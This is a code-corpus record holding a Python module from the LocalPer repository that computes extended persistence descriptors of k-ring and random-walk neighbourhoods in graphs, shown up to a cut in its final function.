hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
7321a67d543f21370a3bddffda3d1f202de2e4dc
| 30,102
|
py
|
Python
|
utils/compute_k_ring_dexPer_network.py
|
minghao92/LocalPer
|
c940dce63ff2583f836d4718ce43023fad310c05
|
[
"MIT"
] | null | null | null |
utils/compute_k_ring_dexPer_network.py
|
minghao92/LocalPer
|
c940dce63ff2583f836d4718ce43023fad310c05
|
[
"MIT"
] | null | null | null |
utils/compute_k_ring_dexPer_network.py
|
minghao92/LocalPer
|
c940dce63ff2583f836d4718ce43023fad310c05
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import snap
from multiprocessing import Pool
import numpy as np
import networkx as nx
from utils import EH_pairs
from utils import EH_pairs_1_ring
from functools import partial
def pick_node_compute_dexPer(Graph, k_ring, NId):
    """Compute the dexPer descriptors (SH0/EH1 pairs from the project's
    EH_pairs computation — presumably 0-/1-dim extended persistence) of the
    k-ring neighbourhood of node NId in Graph.

    Returns a pair (dexPer0, dexPer1); both are empty dicts for an
    isolated node (BFS tree depth 0).
    """
    dexPer0 = {}
    dexPer1 = {}
    # Size/depth of the BFS tree rooted at NId (following both directions).
    [BfsTree_size, _, BfsTree_depth] = snap.GetSubTreeSz(Graph, NId, True, True)
    #print "Size %d, Depth %d" % (BfsTree_size, BfsTree_depth)
    # Restrict to the weakly connected component containing NId.
    CnCom = snap.TIntV()
    snap.GetNodeWcc(Graph, NId, CnCom)
    SubGraph = snap.GetSubGraph(Graph, CnCom)
    ############################################################################################################
    # Isolated nodes
    if BfsTree_depth == 0:
        return dexPer0, dexPer1
    #############################################################################################
    else:
        # Height function: hop distance from NId, up to k_ring hops (and no
        # deeper than the BFS tree itself).
        heightVal = {}
        NodeVec = snap.TIntV()
        heightVal[NId] = 0
        for dist in range (1, min(k_ring + 1, BfsTree_depth + 1)):
            snap.GetNodesAtHop(SubGraph, NId, dist, NodeVec, False)
            for item in NodeVec:
                heightVal[item] = dist
        # Build a modified graph in which every edge joining two nodes at the
        # same height is subdivided by a fresh node at height +0.5, so the
        # height function is strictly monotone along every edge.
        Modified_Graph = snap.TUNGraph.New()
        New_Node = SubGraph.GetMxNId()
        for EI in SubGraph.Edges():
            Src_idx = EI.GetSrcNId()
            Dst_idx = EI.GetDstNId()
            # -1 marks an endpoint outside the k-ring (no height assigned).
            Src_dist = heightVal.get(Src_idx, -1)
            Dst_dist = heightVal.get(Dst_idx, -1)
            if not Modified_Graph.IsNode(Src_idx):
                Modified_Graph.AddNode(Src_idx)
            if not Modified_Graph.IsNode(Dst_idx):
                Modified_Graph.AddNode(Dst_idx)
            # Keep only edges with both endpoints inside the k-ring.
            if Src_dist >= 0 and Dst_dist >= 0:
                if Src_dist == Dst_dist:
                    #print(New_Nodes)
                    Modified_Graph.AddNode(New_Node)
                    Modified_Graph.AddEdge(EI.GetSrcNId(), New_Node)
                    Modified_Graph.AddEdge(EI.GetDstNId(), New_Node)
                    heightVal[New_Node] = Src_dist + 0.5
                    New_Node += 1
                else:
                    Modified_Graph.AddEdge(EI.GetSrcNId(), EI.GetDstNId())
        EH_computation = EH_pairs(Modified_Graph, heightVal)
        return EH_computation.get_SH0(), EH_computation.get_EH1()
def pick_node_compute_dexPer0(Graph, k_ring, NId):
    """0-dimensional-only variant of pick_node_compute_dexPer.

    Same neighbourhood construction, but returns only the SH0 part
    (a single dict; empty for an isolated node).
    """
    dexPer0 = {}
    # Size/depth of the BFS tree rooted at NId (following both directions).
    [BfsTree_size, _, BfsTree_depth] = snap.GetSubTreeSz(Graph, NId, True, True)
    #print "Size %d, Depth %d" % (BfsTree_size, BfsTree_depth)
    # Restrict to the weakly connected component containing NId.
    CnCom = snap.TIntV()
    snap.GetNodeWcc(Graph, NId, CnCom)
    SubGraph = snap.GetSubGraph(Graph, CnCom)
    ############################################################################################################
    # Isolated nodes
    if BfsTree_depth == 0:
        return dexPer0
    #############################################################################################
    else:
        # Height function: hop distance from NId, capped at k_ring hops.
        heightVal = {}
        NodeVec = snap.TIntV()
        heightVal[NId] = 0
        for dist in range (1, min(k_ring + 1, BfsTree_depth + 1)):
            snap.GetNodesAtHop(SubGraph, NId, dist, NodeVec, False)
            for item in NodeVec:
                heightVal[item] = dist
        # Subdivide same-height edges with a midpoint node at height +0.5 so
        # the height function is strictly monotone along every edge.
        Modified_Graph = snap.TUNGraph.New()
        New_Node = SubGraph.GetMxNId()
        for EI in SubGraph.Edges():
            Src_idx = EI.GetSrcNId()
            Dst_idx = EI.GetDstNId()
            # -1 marks an endpoint outside the k-ring (no height assigned).
            Src_dist = heightVal.get(Src_idx, -1)
            Dst_dist = heightVal.get(Dst_idx, -1)
            if not Modified_Graph.IsNode(Src_idx):
                Modified_Graph.AddNode(Src_idx)
            if not Modified_Graph.IsNode(Dst_idx):
                Modified_Graph.AddNode(Dst_idx)
            # Keep only edges with both endpoints inside the k-ring.
            if Src_dist >= 0 and Dst_dist >= 0:
                if Src_dist == Dst_dist:
                    #print(New_Nodes)
                    Modified_Graph.AddNode(New_Node)
                    Modified_Graph.AddEdge(EI.GetSrcNId(), New_Node)
                    Modified_Graph.AddEdge(EI.GetDstNId(), New_Node)
                    heightVal[New_Node] = Src_dist + 0.5
                    New_Node += 1
                else:
                    Modified_Graph.AddEdge(EI.GetSrcNId(), EI.GetDstNId())
        EH_computation = EH_pairs(Modified_Graph, heightVal)
        return EH_computation.get_SH0()
def pick_node_compute_RW_dexPer(Graph, num_steps, sample_rate, NId, max_num_walks_per_node):
    """Compute dexPer (SH0/EH1 via EH_pairs) of the subgraph visited by a
    num_steps random walk started at node NId.

    Returns a pair (dexPer0, dexPer1); both are empty dicts for an
    isolated node.
    """
    dexPer0 = {}
    dexPer1 = {}
    nbrs = Graph.GetNI(NId).GetDeg()
    ###########################################################################################################
    # Isolated node: no walk possible.
    if nbrs == 0:
        return dexPer0, dexPer1
    ###########################################################################################################
    # NOTE(review): num_walks is computed but never used below — confirm intent.
    num_walks = min(int(np.ceil(nbrs * sample_rate)), max_num_walks_per_node)
    visited_nodes = snap.TIntV()
    visited_nodes.Add(NId)
    # Random walk: at each step jump to a uniformly chosen neighbour and
    # record first visits.
    node = NId
    for j in range(num_steps):
        NodeVec = snap.TIntV()
        snap.GetNodesAtHop(Graph, node, 1, NodeVec, False)
        new_node_id = np.random.choice(NodeVec, 1).item()
        # BUG FIX: the original referenced the undefined name RW_Nodes here,
        # raising NameError on every non-isolated node; visited_nodes is the
        # vector actually declared above and used to build SubGraph.
        if new_node_id not in visited_nodes:
            visited_nodes.Add(new_node_id)
        node = new_node_id
    SubGraph = snap.GetSubGraph(Graph, visited_nodes)
    # Depth of the BFS tree inside the visited subgraph bounds the height levels.
    [BfsTree_size, _, BfsTree_depth] = snap.GetSubTreeSz(SubGraph, NId, True, True)
    # (The original re-checked `nbrs == 0` here; that branch was dead because
    # of the early return above, so it has been removed.)
    # Height function: hop distance from NId inside the visited subgraph.
    heightVal = {}
    NodeVec = snap.TIntV()
    heightVal[NId] = 0
    for dist in range(1, BfsTree_depth + 1):
        snap.GetNodesAtHop(SubGraph, NId, dist, NodeVec, False)
        for item in NodeVec:
            heightVal[item] = dist
    # Subdivide same-height edges with a midpoint node at height +0.5 so the
    # height function is strictly monotone along every edge.
    Modified_Graph = snap.TUNGraph.New()
    New_Node = SubGraph.GetMxNId()
    for EI in SubGraph.Edges():
        Src_idx = EI.GetSrcNId()
        Dst_idx = EI.GetDstNId()
        # -1 marks an endpoint with no assigned height.
        Src_dist = heightVal.get(Src_idx, -1)
        Dst_dist = heightVal.get(Dst_idx, -1)
        if not Modified_Graph.IsNode(Src_idx):
            Modified_Graph.AddNode(Src_idx)
        if not Modified_Graph.IsNode(Dst_idx):
            Modified_Graph.AddNode(Dst_idx)
        if Src_dist >= 0 and Dst_dist >= 0:
            if Src_dist == Dst_dist:
                Modified_Graph.AddNode(New_Node)
                Modified_Graph.AddEdge(EI.GetSrcNId(), New_Node)
                Modified_Graph.AddEdge(EI.GetDstNId(), New_Node)
                heightVal[New_Node] = Src_dist + 0.5
                New_Node += 1
            else:
                Modified_Graph.AddEdge(EI.GetSrcNId(), EI.GetDstNId())
    EH_computation = EH_pairs(Modified_Graph, heightVal)
    return EH_computation.get_SH0(), EH_computation.get_EH1()
def pick_node_compute_RW_dexPer_in_kring(Graph, num_steps, sample_rate, k_ring, NId):
    """Compute dexPer of a random walk from NId, restricted to NId's
    k-ring neighbourhood.

    Returns a pair (dexPer0, dexPer1); both are empty dicts for an
    isolated node.
    """
    dexPer0 = {}
    dexPer1 = {}
    nbrs = Graph.GetNI(NId).GetDeg()
    ###########################################################################################################
    # Isolated node.
    # BUG FIX: the original returned the undefined names SH0, EH1 here
    # (NameError); the empty dicts declared above are the intended result.
    if nbrs == 0:
        return dexPer0, dexPer1
    ###########################################################################################################
    # NOTE(review): num_walks is computed but never used below — confirm intent.
    num_walks = int(np.ceil(nbrs * sample_rate))
    # Collect the k-ring around NId (bounded by the BFS tree depth).
    visited_nodes = snap.TIntV()
    visited_nodes.Add(NId)
    NodeVec = snap.TIntV()
    [BfsTree_size, _, BfsTree_depth] = snap.GetSubTreeSz(Graph, NId, True, True)
    for dist in range(1, min(k_ring + 1, BfsTree_depth + 1)):
        snap.GetNodesAtHop(Graph, NId, dist, NodeVec, False)
        for item in NodeVec:
            visited_nodes.Add(item)
    SubGraph = snap.GetSubGraph(Graph, visited_nodes)
    # Random walk of num_steps over the full graph, recording first visits.
    RW_Nodes = snap.TIntV()
    RW_Nodes.Add(NId)
    node = NId
    for j in range(num_steps):
        NodeVec = snap.TIntV()
        snap.GetNodesAtHop(Graph, node, 1, NodeVec, False)
        new_node_id = np.random.choice(NodeVec, 1).item()
        if new_node_id not in RW_Nodes:
            RW_Nodes.Add(new_node_id)
        node = new_node_id
    # Intersect the walk with the k-ring subgraph.
    RW_Graph = snap.GetSubGraph(SubGraph, RW_Nodes)
    ############################################################################################################
    # Height function: hop distance from NId inside the walk subgraph.
    heightVal = {}
    NodeVec = snap.TIntV()
    heightVal[NId] = 0
    for dist in range(1, min(k_ring + 1, BfsTree_depth + 1)):
        snap.GetNodesAtHop(RW_Graph, NId, dist, NodeVec, False)
        for item in NodeVec:
            heightVal[item] = dist
    # Subdivide same-height edges with a midpoint node at height +0.5.
    Modified_Graph = snap.TUNGraph.New()
    New_Node = RW_Graph.GetMxNId()
    for EI in RW_Graph.Edges():
        Src_idx = EI.GetSrcNId()
        Dst_idx = EI.GetDstNId()
        # -1 marks an endpoint with no assigned height.
        Src_dist = heightVal.get(Src_idx, -1)
        Dst_dist = heightVal.get(Dst_idx, -1)
        if not Modified_Graph.IsNode(Src_idx):
            Modified_Graph.AddNode(Src_idx)
        if not Modified_Graph.IsNode(Dst_idx):
            Modified_Graph.AddNode(Dst_idx)
        if Src_dist >= 0 and Dst_dist >= 0:
            if Src_dist == Dst_dist:
                Modified_Graph.AddNode(New_Node)
                Modified_Graph.AddEdge(EI.GetSrcNId(), New_Node)
                Modified_Graph.AddEdge(EI.GetDstNId(), New_Node)
                heightVal[New_Node] = Src_dist + 0.5
                New_Node += 1
            else:
                Modified_Graph.AddEdge(EI.GetSrcNId(), EI.GetDstNId())
    EH_computation = EH_pairs(Modified_Graph, heightVal)
    return EH_computation.get_SH0(), EH_computation.get_EH1()
def pick_node_compute_RW_dexPer_steps(Graph, num_steps, NId):
    """Compute dexPer of the subgraph visited by a num_steps random walk
    started at NId (no sampling rate, just a fixed step count).

    Returns a pair (dexPer0, dexPer1); both are empty dicts for an
    isolated node.
    """
    dexPer0 = {}
    dexPer1 = {}
    nbrs = Graph.GetNI(NId).GetDeg()
    ###########################################################################################################
    # Isolated node: no walk possible.
    if nbrs == 0:
        return dexPer0, dexPer1
    ###########################################################################################################
    # NOTE(review): this depth is measured on the FULL graph but later bounds
    # the BFS levels of RW_Graph (a subgraph). That over-estimates the depth,
    # which only costs extra empty GetNodesAtHop calls — confirm intent.
    [BfsTree_size, _, BfsTree_depth] = snap.GetSubTreeSz(Graph, NId, True, True)
    # Random walk: jump to a uniformly chosen neighbour, record first visits.
    RW_Nodes = snap.TIntV()
    RW_Nodes.Add(NId)
    node = NId
    for j in range(num_steps):
        NodeVec = snap.TIntV()
        snap.GetNodesAtHop(Graph, node, 1, NodeVec, False)
        new_node_id = np.random.choice(NodeVec, 1).item()
        if new_node_id not in RW_Nodes:
            RW_Nodes.Add(new_node_id)
        node = new_node_id
    RW_Graph = snap.GetSubGraph(Graph, RW_Nodes)
    #############################################################################################
    # Height function: hop distance from NId inside the visited subgraph.
    heightVal = {}
    NodeVec = snap.TIntV()
    heightVal[NId] = 0
    for dist in range (1, BfsTree_depth + 1):
        snap.GetNodesAtHop(RW_Graph, NId, dist, NodeVec, False)
        for item in NodeVec:
            heightVal[item] = dist
    # Subdivide same-height edges with a midpoint node at height +0.5 so the
    # height function is strictly monotone along every edge.
    Modified_Graph = snap.TUNGraph.New()
    New_Node = RW_Graph.GetMxNId()
    for EI in RW_Graph.Edges():
        Src_idx = EI.GetSrcNId()
        Dst_idx = EI.GetDstNId()
        # -1 marks an endpoint with no assigned height.
        Src_dist = heightVal.get(Src_idx, -1)
        Dst_dist = heightVal.get(Dst_idx, -1)
        if not Modified_Graph.IsNode(Src_idx):
            Modified_Graph.AddNode(Src_idx)
        if not Modified_Graph.IsNode(Dst_idx):
            Modified_Graph.AddNode(Dst_idx)
        if Src_dist >= 0 and Dst_dist >= 0:
            if Src_dist == Dst_dist:
                #print(New_Nodes)
                Modified_Graph.AddNode(New_Node)
                Modified_Graph.AddEdge(EI.GetSrcNId(), New_Node)
                Modified_Graph.AddEdge(EI.GetDstNId(), New_Node)
                heightVal[New_Node] = Src_dist + 0.5
                New_Node += 1
            else:
                Modified_Graph.AddEdge(EI.GetSrcNId(), EI.GetDstNId())
    EH_computation = EH_pairs(Modified_Graph, heightVal)
    return EH_computation.get_SH0(), EH_computation.get_EH1()
def pick_node_compute_RW_dexPer_steps_flyback(Graph, num_steps, NId, flyback_prob=0.15):
    """Random-walk dexPer with flyback: at each of num_steps steps the walk
    returns to NId with probability flyback_prob, otherwise moves to a
    uniformly chosen neighbour of the current node.

    Returns a pair (dexPer0, dexPer1); both are empty dicts for an
    isolated node.
    """
    dexPer0 = {}
    dexPer1 = {}
    nbrs = Graph.GetNI(NId).GetDeg()
    ###########################################################################################################
    # Isolated node: no walk possible.
    if nbrs == 0:
        return dexPer0, dexPer1
    ###########################################################################################################
    [BfsTree_size, _, BfsTree_depth] = snap.GetSubTreeSz(Graph, NId, True, True)
    RW_Nodes = snap.TIntV()
    RW_Nodes.Add(NId)
    node = NId
    for j in range(num_steps):
        if np.random.uniform(size=1) <= flyback_prob:
            # Fly back to the start node.
            # BUG FIX: the original did `j -= 1` here, apparently so a
            # flyback would not consume a step; that is a no-op in a Python
            # for-loop (j is rebound each iteration) and has been removed.
            # A flyback still counts as a step, matching the original's
            # actual (not intended) behavior.
            node = NId
        else:
            NodeVec = snap.TIntV()
            snap.GetNodesAtHop(Graph, node, 1, NodeVec, False)
            new_node_id = np.random.choice(NodeVec, 1).item()
            if new_node_id not in RW_Nodes:
                RW_Nodes.Add(new_node_id)
            node = new_node_id
    RW_Graph = snap.GetSubGraph(Graph, RW_Nodes)
    # Depth of the BFS tree inside the visited subgraph bounds the height levels.
    [BfsTree_size, _, BfsTree_depth] = snap.GetSubTreeSz(RW_Graph, NId, True, True)
    ############################################################################################################
    # Height function: hop distance from NId inside the visited subgraph.
    heightVal = {}
    NodeVec = snap.TIntV()
    heightVal[NId] = 0
    for dist in range(1, BfsTree_depth + 1):
        snap.GetNodesAtHop(RW_Graph, NId, dist, NodeVec, False)
        for item in NodeVec:
            heightVal[item] = dist
    # Subdivide same-height edges with a midpoint node at height +0.5.
    Modified_Graph = snap.TUNGraph.New()
    New_Node = RW_Graph.GetMxNId()
    for EI in RW_Graph.Edges():
        Src_idx = EI.GetSrcNId()
        Dst_idx = EI.GetDstNId()
        # -1 marks an endpoint with no assigned height.
        Src_dist = heightVal.get(Src_idx, -1)
        Dst_dist = heightVal.get(Dst_idx, -1)
        if not Modified_Graph.IsNode(Src_idx):
            Modified_Graph.AddNode(Src_idx)
        if not Modified_Graph.IsNode(Dst_idx):
            Modified_Graph.AddNode(Dst_idx)
        if Src_dist >= 0 and Dst_dist >= 0:
            if Src_dist == Dst_dist:
                Modified_Graph.AddNode(New_Node)
                Modified_Graph.AddEdge(EI.GetSrcNId(), New_Node)
                Modified_Graph.AddEdge(EI.GetDstNId(), New_Node)
                heightVal[New_Node] = Src_dist + 0.5
                New_Node += 1
            else:
                Modified_Graph.AddEdge(EI.GetSrcNId(), EI.GetDstNId())
    EH_computation = EH_pairs(Modified_Graph, heightVal)
    return EH_computation.get_SH0(), EH_computation.get_EH1()
def dexPer_of_a_vertex(filename, k_ring, NId):
    """Load a tab-separated undirected edge list and return [dexPer0, dexPer1]
    for node NId's k-ring neighbourhood."""
    graph = snap.LoadEdgeList(snap.PUNGraph, filename, 0, 1, '\t')
    d0, d1 = pick_node_compute_dexPer(graph, k_ring, NId)
    return [d0, d1]
def RW_dexPer_of_a_vertex(filename, num_steps, rate, NId, max_num_walks_per_node=np.inf):
    """Load a tab-separated undirected edge list and return [dexPer0, dexPer1]
    of a random walk from node NId.

    BUG FIX: the original assigned the result to SH0/EH1 but returned the
    undefined names dexPer0/dexPer1 (NameError), and omitted the mandatory
    max_num_walks_per_node argument of pick_node_compute_RW_dexPer
    (TypeError).  The new keyword default (np.inf, i.e. no cap) keeps the
    signature backward-compatible for existing callers.
    """
    Graph = snap.LoadEdgeList(snap.PUNGraph, filename, 0, 1, '\t')
    dexPer0, dexPer1 = pick_node_compute_RW_dexPer(Graph, num_steps, rate, NId, max_num_walks_per_node)
    return [dexPer0, dexPer1]
def RW_dexPer_of_a_vertex_in_kring(filename, num_steps, rate, k_ring, NId):
    """Load a tab-separated undirected edge list and return [dexPer0, dexPer1]
    of a k-ring-restricted random walk from node NId."""
    graph = snap.LoadEdgeList(snap.PUNGraph, filename, 0, 1, '\t')
    pair = pick_node_compute_RW_dexPer_in_kring(graph, num_steps, rate, k_ring, NId)
    return list(pair)
def RW_dexPer_of_a_vertex_steps(filename, num_steps, NId):
    """Load a tab-separated undirected edge list and return [dexPer0, dexPer1]
    of a fixed-step random walk from node NId."""
    graph = snap.LoadEdgeList(snap.PUNGraph, filename, 0, 1, '\t')
    pair = pick_node_compute_RW_dexPer_steps(graph, num_steps, NId)
    return list(pair)
##############################################################################################
def dexPer_of_all_vertices(Graph, k_ring):
    """Compute (dexPer0, dexPer1) for every node of Graph, in node-iteration
    order.  The 1-ring case uses the dedicated EH_pairs_1_ring computation."""
    dexPer0_all = []
    dexPer1_all = []
    for NI in Graph.Nodes():
        node_id = NI.GetId()
        if k_ring == 1:
            pairs = EH_pairs_1_ring(Graph, node_id)
            d0 = pairs.get_SH0()
            d1 = pairs.get_EH1()
        else:
            d0, d1 = pick_node_compute_dexPer(Graph, k_ring, node_id)
        dexPer0_all.append(d0)
        dexPer1_all.append(d1)
    return dexPer0_all, dexPer1_all
def dexPer_of_all_vertices_dir(filename, k_ring):
    """Load a tab-separated undirected edge list from filename and compute
    dexPer for all of its vertices."""
    graph = snap.LoadEdgeList(snap.PUNGraph, filename, 0, 1, '\t')
    return dexPer_of_all_vertices(graph, k_ring)
def dexPer0_of_all_vertices(Graph, k_ring):
    """Compute only the 0-dimensional dexPer for every node of Graph, in
    node-iteration order."""
    dexPer0_all = []
    for NI in Graph.Nodes():
        node_id = NI.GetId()
        if k_ring == 1:
            d0 = EH_pairs_1_ring(Graph, node_id).get_SH0()
        else:
            d0 = pick_node_compute_dexPer0(Graph, k_ring, node_id)
        dexPer0_all.append(d0)
    return dexPer0_all
def dexPer_of_vertices_with_large_degree(Graph, k_ring, num_nodes):
    """Compute dexPer for (up to) the num_nodes highest-degree vertices.

    The threshold is the num_nodes-th largest degree; degree ties are
    resolved by node-iteration order, and the `i < num_nodes` guard caps
    the number of processed vertices.
    """
    num_nodes = min(Graph.GetNodes(), num_nodes)
    dexPer0_all = [[]] * num_nodes
    dexPer1_all = [[]] * num_nodes
    i = 0
    degree_seq = snap.TIntV()
    snap.GetDegSeqV(Graph, degree_seq)
    degree_seq.Sort()
    degs = [item for item in degree_seq]
    # Smallest degree that still ranks in the top num_nodes.
    threshold = degs[-num_nodes]
    for NI in Graph.Nodes():
        if NI.GetDeg() >= threshold and i < num_nodes:
            NI_Id = NI.GetId()
            if k_ring == 1:
                # 1-ring case has a dedicated computation.
                EH_computation = EH_pairs_1_ring(Graph, NI_Id)
                dexPer0 = EH_computation.get_SH0()
                dexPer1 = EH_computation.get_EH1()
            else:
                dexPer0, dexPer1 = pick_node_compute_dexPer(Graph, k_ring, NI_Id)
            dexPer0_all[i] = dexPer0
            dexPer1_all[i] = dexPer1
            i += 1
    return dexPer0_all, dexPer1_all
def dexPer_of_vertices_with_large_degree_percentage(Graph, k_ring, top_percentage):
    """Compute dexPer for the top_percentage fraction of vertices with the
    largest degree (num_nodes = floor(N * top_percentage)).

    NOTE(review): if top_percentage is small enough that num_nodes == 0,
    `degs[-num_nodes]` indexes degs[0]; the `i < num_nodes` guard then
    skips every node, so empty lists are returned — confirm that is the
    desired behavior.
    """
    num_nodes = int(Graph.GetNodes() * top_percentage)
    dexPer0_all = [[]] * num_nodes
    dexPer1_all = [[]] * num_nodes
    i = 0
    degree_seq = snap.TIntV()
    snap.GetDegSeqV(Graph, degree_seq)
    degree_seq.Sort()
    degs = [item for item in degree_seq]
    # Smallest degree that still ranks in the top num_nodes.
    threshold = degs[-num_nodes]
    for NI in Graph.Nodes():
        if NI.GetDeg() >= threshold and i < num_nodes:
            NI_Id = NI.GetId()
            if k_ring == 1:
                # 1-ring case has a dedicated computation.
                EH_computation = EH_pairs_1_ring(Graph, NI_Id)
                dexPer0 = EH_computation.get_SH0()
                dexPer1 = EH_computation.get_EH1()
            else:
                dexPer0, dexPer1 = pick_node_compute_dexPer(Graph, k_ring, NI_Id)
            dexPer0_all[i] = dexPer0
            dexPer1_all[i] = dexPer1
            i += 1
    return dexPer0_all, dexPer1_all
def dexPer_of_vertices_with_large_eigenvector_centrality(Graph, k_ring, num_nodes):
    """Compute dexPer for (up to) the num_nodes vertices with the largest
    eigenvector centrality.

    BUG FIX: the original called the undefined name pick_node_compute_EH
    (NameError whenever k_ring != 1); it now calls pick_node_compute_dexPer,
    matching the degree-based selectors in this file.
    """
    num_nodes = min(Graph.GetNodes(), num_nodes)
    dexPer0_all = [[]] * num_nodes
    dexPer1_all = [[]] * num_nodes
    i = 0
    eps = 1e-7  # tolerance for the float threshold comparison
    eigen_seq = snap.TIntFltH()
    snap.GetEigenVectorCentr(Graph, eigen_seq)
    eigens = [eigen_seq[item] for item in eigen_seq]
    eigens = sorted(eigens)
    # Smallest centrality that still ranks in the top num_nodes.
    threshold = eigens[-num_nodes]
    for NI in Graph.Nodes():
        NI_Id = NI.GetId()
        if eigen_seq[NI_Id] >= (threshold - eps) and i < num_nodes:
            if k_ring == 1:
                # 1-ring case has a dedicated computation.
                EH_computation = EH_pairs_1_ring(Graph, NI_Id)
                dexPer0 = EH_computation.get_SH0()
                dexPer1 = EH_computation.get_EH1()
            else:
                dexPer0, dexPer1 = pick_node_compute_dexPer(Graph, k_ring, NI_Id)
            dexPer0_all[i] = dexPer0
            dexPer1_all[i] = dexPer1
            i += 1
    return dexPer0_all, dexPer1_all
def dexPer_of_vertices_with_large_eigenvector_centrality_percentage(Graph, k_ring, top_percentage):
    """Compute dexPer for the top_percentage fraction of vertices with the
    largest eigenvector centrality.

    BUG FIX: the original called the undefined name pick_node_compute_EH
    (NameError whenever k_ring != 1); it now calls pick_node_compute_dexPer,
    matching the degree-based selectors in this file.
    """
    num_nodes = int(Graph.GetNodes() * top_percentage)
    dexPer0_all = [[]] * num_nodes
    dexPer1_all = [[]] * num_nodes
    i = 0
    eps = 1e-7  # tolerance for the float threshold comparison
    eigen_seq = snap.TIntFltH()
    snap.GetEigenVectorCentr(Graph, eigen_seq)
    eigens = [eigen_seq[item] for item in eigen_seq]
    eigens = sorted(eigens)
    # Smallest centrality that still ranks in the top num_nodes.
    threshold = eigens[-num_nodes]
    for NI in Graph.Nodes():
        NI_Id = NI.GetId()
        if eigen_seq[NI_Id] >= (threshold - eps) and i < num_nodes:
            if k_ring == 1:
                # 1-ring case has a dedicated computation.
                EH_computation = EH_pairs_1_ring(Graph, NI_Id)
                dexPer0 = EH_computation.get_SH0()
                dexPer1 = EH_computation.get_EH1()
            else:
                dexPer0, dexPer1 = pick_node_compute_dexPer(Graph, k_ring, NI_Id)
